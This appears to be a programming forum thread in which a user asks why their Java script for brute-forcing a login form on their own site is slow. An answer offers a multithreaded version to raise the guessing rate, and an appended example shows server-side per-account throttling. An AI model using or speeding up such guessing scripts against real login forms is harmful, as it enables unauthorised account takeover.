I'm trying to brute force a simple login form I myself created on my website. Initially I used WebScarab's fuzzer plugin, which is pretty fast. Then I wanted to customize more, so I thought I could get the brute force done with very simple coding. But to my surprise, my Java code runs so slowly: about 2.5 requests per second, which is much slower than the WebScarab plugin. I feel I'm maybe not doing the connection part right. Any help? Thanks!
import java.io.BufferedReader;
import java.io.DataOutputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;

public class HTTPURLConnection {
    int guessPassword = 0;

    public static void main(String[] args) throws Exception {
        HTTPURLConnection http = new HTTPURLConnection();
        System.out.println("Start!");
        // I'm simply guessing password ranging from 0 to 200
        for (int i = 0; i < 200; i++) {
            if (http.sendPost())
                break;
        }
        System.out.println("Done!");
    }

    // Sends one login POST with the next guess; returns true unless the form answers "false".
    private boolean sendPost() throws Exception {
        String url = "http://mywebsite.com/myfile.php";
        URL obj = new URL(url);
        HttpURLConnection con = (HttpURLConnection) obj.openConnection();
        // add request header
        con.setRequestMethod("POST");
        con.setRequestProperty("User-Agent", "Mozilla/5.0 etc.");
        con.setRequestProperty("Accept-Language", "en-US,en;q=0.8");
        con.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
        con.setRequestProperty("Connection", "keep-alive");
        con.setRequestProperty("Accept", "*/*");
        con.setRequestProperty("Accept-Encoding", "gzip,deflate,sdch");
        guessPassword++;
        String urlParameters = "name=userName&pwd=" + guessPassword;
        // Send post request
        con.setDoOutput(true);
        DataOutputStream wr = new DataOutputStream(con.getOutputStream());
        wr.writeBytes(urlParameters);
        wr.flush();
        wr.close();
        int responseCode = con.getResponseCode();
        // Read the whole response body
        BufferedReader in = new BufferedReader(
                new InputStreamReader(con.getInputStream()));
        String inputLine;
        StringBuffer response = new StringBuffer();
        while ((inputLine = in.readLine()) != null) {
            response.append(inputLine);
        }
        in.close();
        // if password is not correct, my form should return false
        if (response.toString().equals("false"))
            return false;
        else
            return true;
    }
}
You could change the input size of the BufferedReader to be bigger. Try using the same URL object instead of re-creating it each time.
Also, you can run this method multiple times at the same time as threads:
import java.io.BufferedReader;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;

class HTTPThread extends Thread {
    URL url;
    // volatile so the result is visible to the thread that reads it
    volatile boolean success = false;
    String pass;

    HTTPThread(URL url, String pass) {
        this.url = url;
        this.pass = pass;
    }

    public void run() {
        try {
            HttpURLConnection con = (HttpURLConnection) url.openConnection();
            // add request header
            con.setRequestMethod("POST");
            con.setRequestProperty("User-Agent", "Mozilla/5.0 etc.");
            con.setRequestProperty("Accept-Language", "en-US,en;q=0.8");
            con.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
            con.setRequestProperty("Connection", "keep-alive");
            con.setRequestProperty("Accept", "*/*");
            con.setRequestProperty("Accept-Encoding", "gzip,deflate,sdch");
            String urlParameters = "name=userName&pwd=" + pass;
            // Send post request
            con.setDoOutput(true);
            DataOutputStream wr = new DataOutputStream(con.getOutputStream());
            wr.writeBytes(urlParameters);
            wr.flush();
            wr.close();
            int responseCode = con.getResponseCode();
            BufferedReader in = new BufferedReader(
                    new InputStreamReader(con.getInputStream()));
            String inputLine;
            StringBuffer response = new StringBuffer();
            while ((inputLine = in.readLine()) != null) {
                response.append(inputLine);
            }
            in.close();
            // if password is not correct, my form should return false
            if (response.toString().equals("false"))
                success = false;
            else
                success = true;
        } catch (IOException e) {
            // run() cannot throw checked exceptions; a failed request counts as no success
            success = false;
        }
    }

    public String getPassword() { return pass; }

    public boolean isSuccess() { return success; }
}
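Added example, not part of the original question or answer: a server-side view of the guessing traffic discussed above, showing why a per-account attempt limit is unaffected by running the guesses in parallel threads. The class `LoginThrottle`, its limits (5 attempts per 60 seconds) and the simulated traffic are assumptions made for illustration.

```java
import java.util.ArrayDeque;
import java.util.Deque;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.atomic.AtomicInteger;

// Hypothetical server-side throttle; class name, limits and traffic are constructed.
public class LoginThrottle {
    private static final int MAX_ATTEMPTS = 5;       // assumed policy
    private static final long WINDOW_MS = 60_000;    // assumed policy
    private final Map<String, Deque<Long>> attempts = new ConcurrentHashMap<>();

    /** Reserves one attempt slot for the account; false means reject before any password check. */
    public boolean tryAttempt(String name, long nowMs) {
        Deque<Long> q = attempts.computeIfAbsent(name, k -> new ArrayDeque<>());
        synchronized (q) {
            // Drop attempts that have aged out of the sliding window.
            while (!q.isEmpty() && nowMs - q.peekFirst() >= WINDOW_MS) q.pollFirst();
            if (q.size() >= MAX_ATTEMPTS) return false;
            q.addLast(nowMs);
            return true;
        }
    }

    /** A correct login clears the account's attempt history. */
    public void recordSuccess(String name) {
        attempts.remove(name);
    }

    public static void main(String[] args) throws InterruptedException {
        LoginThrottle throttle = new LoginThrottle();
        AtomicInteger evaluated = new AtomicInteger();
        ExecutorService pool = Executors.newFixedThreadPool(8);
        // Constructed traffic: 200 parallel guesses against one account name.
        for (int i = 0; i < 200; i++) {
            pool.execute(() -> {
                if (throttle.tryAttempt("userName", System.currentTimeMillis())) {
                    evaluated.incrementAndGet(); // only these would reach the password check
                }
            });
        }
        pool.shutdown();
        pool.awaitTermination(10, TimeUnit.SECONDS);
        System.out.println("evaluated=" + evaluated.get() + " rejected=" + (200 - evaluated.get()));
    }
}
```

Because the counter is keyed on the account name and the slot is reserved under a lock, the number of evaluated guesses per window is the same whether the requests arrive one at a time or from many threads.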